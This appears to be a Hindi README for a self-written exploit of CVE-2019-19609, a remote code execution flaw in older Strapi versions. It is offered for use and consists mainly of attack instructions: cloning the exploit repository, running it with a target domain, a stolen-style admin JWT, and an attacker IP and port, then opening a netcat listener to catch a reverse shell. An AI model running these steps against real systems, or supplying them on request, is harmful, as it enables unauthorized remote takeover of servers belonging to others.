
Strapi में CVE-2019-19609 के लिए एक्सप्लॉइट (रिमोट कोड एक्ज़ीक्यूशन)
CVE-2019-19609 के लिए Strapi में एक्सप्लॉइट (strapi-3.0.0-beta.17.7 या उससे पहले के संस्करण में रिमोट कोड निष्पादन)।
मुझे इस कमजोरी से संबंधित एक परिदृश्य का सामना करना पड़ा, लेकिन कोई सार्वजनिक एक्सप्लॉइट नहीं था। मैंने अपना खुद का एक्सप्लॉइट बनाने और इसे यहाँ साझा करने का निर्णय लिया।
git clone https://github.com/diego-tella/CVE-2019-19609-EXPLOIT
cd CVE-2019-19609-EXPLOIT
python exploit.py -d DOMAIN_OR_IP -jwt JSON_WEB_TOKEN -l LHOST -p LPORT
python exploit.py -d example.com -jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMjU3NDc3LCJleHAiOjE2MzI4NDk0Nzd9.JIKHRz_EDXg1fhThRhIbIyZ9w-6mE01dhnno2AtMMU0 -l 10.10.14.86 -p 1221
दूसरे टर्मिनल पर, एक्सप्लॉइट में दिए गए पोर्ट पर सुनना शुरू करें।
nc -vnlp 1221